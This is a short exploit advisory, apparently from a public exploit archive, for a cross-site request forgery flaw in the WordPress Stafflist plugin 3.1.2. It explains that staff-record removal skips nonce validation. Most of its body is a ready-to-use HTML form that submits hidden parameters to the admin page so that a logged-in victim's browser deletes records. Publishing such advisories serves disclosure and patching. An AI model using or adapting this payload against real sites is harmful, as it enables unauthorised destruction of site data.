WordPress Stafflist 3.1.2 Cross Site Request Forgery

WordPress Stafflist plugin version 3.1.2 suffers from a cross site request forgery vulnerability.

SHA-256 | 9d6c94780d9e6bad20039cfa30e21ac1263e9e05f4af98d371874857a71295c3

# Exploit Title: WordPress Plugin stafflist 3.1.2 - CSRF (Authenticated)
# Date: 05-02-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/stafflist/
# Version: 3.1.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com

# Summary:

A CSRF vulnerability exists in staff record remove functionality in
WordPress Plugin Stafflist 3.1.2.

This vulnerability allows an attacker to delete existing records by
triggring a CSRF html request, due to not validating wp_nouce token in
the request.

# Exploit

As n authenticated user:

<form action="http://localhost:10003/wp-admin/admin.php">
<input type="hidden" name="page" value="stafflist" />
<input type="hidden" name="remove" value="1" />
<input type="hidden" name="p" value="1" />
<input type="hidden" name="s" value="1" />
<input type="submit" value="Submit request" />

Related Posts